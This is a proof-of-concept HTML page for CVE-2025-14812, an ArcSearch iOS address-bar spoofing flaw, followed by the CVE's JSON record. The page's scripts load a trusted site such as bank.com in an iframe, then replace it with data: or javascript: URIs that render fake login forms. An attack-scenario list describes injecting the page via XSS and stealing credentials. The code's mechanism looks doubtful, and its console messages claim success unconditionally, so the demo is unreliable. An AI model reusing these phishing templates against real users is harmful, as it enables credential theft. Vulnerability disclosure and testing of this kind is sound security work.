CVE-2025-14812

<!-- CVE-2025-14812 PoC: Address Bar Spoofing via iframe-triggered URI-scheme navigation --> <!DOCTYPE html> <html> <head> <title>Address Bar Spoofing PoC</title> </head> <body> <h1>ArcSearch iOS Address Bar Spoofing Demo</h1> <p>This PoC demonstrates the CVE-2025-14812 vulnerability.</p> <script> // Simulate the address bar spoofing attack function triggerSpoofing() { // Create an iframe pointing to a legitimate site const iframe = document.createElement('iframe'); iframe.src = 'https://www.example.com'; iframe.id = 'targetFrame'; document.body.appendChild(iframe); // After a delay, trigger URI-scheme navigation in the iframe setTimeout(() => { // This navigation will show a different domain in address bar // while displaying malicious content const frame = document.getElementById('targetFrame'); frame.src = 'data:text/html,<html><body><h1>Fake Login Page</h1><form><input type="text" placeholder="Email"><input type="password" placeholder="Password"><button>Login</button></form></body></html>'; // The address bar still shows example.com, but content is from data: URI console.log('Address bar spoofing triggered successfully'); console.log('User sees: https://www.example.com'); console.log('Actual content: data:text/html (malicious phishing page)'); }, 2000); } // Alternative method using javascript: URI function triggerJavaScriptSpoofing() { const iframe = document.createElement('iframe'); iframe.src = 'https://www.bank.com'; document.body.appendChild(iframe); setTimeout(() => { iframe.src = 'javascript:void(document.write("<html><body><h1>Please Login Again</h1><form><input type=\"email\"><input type=\"password\"><button>Submit</button></form></body></html>"))'; }, 2000); } </script> <button onclick="triggerSpoofing()">Test Data URI Spoofing</button> <button onclick="triggerJavaScriptSpoofing()">Test JavaScript URI Spoofing</button> <h2>Attack Scenario:</h2> <ol> <li>Attacker hosts this malicious page or injects it via XSS</li> <li>Victim using ArcSearch iOS visits the page</li> <li>Page loads legitimate domain in iframe (address bar shows trusted domain)</li> <li>JavaScript redirects iframe to attacker-controlled content via URI-scheme</li> <li>Address bar still shows legitimate domain, but content is malicious</li> <li>Victim enters credentials thinking they're on legitimate site</li> <li>Attacker steals credentials</li> </ol> <h2>Fix:</h2> <p>Upgrade ArcSearch for iOS to version 1.45.2 or later</p> </body> </html>

{"cve": {"id": "CVE-2025-14812", "sourceIdentifier": "59469e6c-7ea7-446f-8e43-06aa32c115e8", "published": "2025-12-19T17:15:50.957", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ArcSearch for iOS versions prior to 1.45.2 could display a different domain in the address bar than the content being shown after an iframe-triggered URI-scheme navigation, increasing spoofing risk."}], "metrics": {"cvssMetricV31": [{"source": "59469e6c-7ea7-446f-8e43-06aa32c115e8", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "59469e6c-7ea7-446f-8e43-06aa32c115e8", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "references": [{"url": "https://arc.net/security/bulletins#cve-2025-14812-address-bar-spoofing-risk-iframe-triggered-uri-navigation-on-arc-search-ios", "source": "59469e6c-7ea7-446f-8e43-06aa32c115e8"}]}}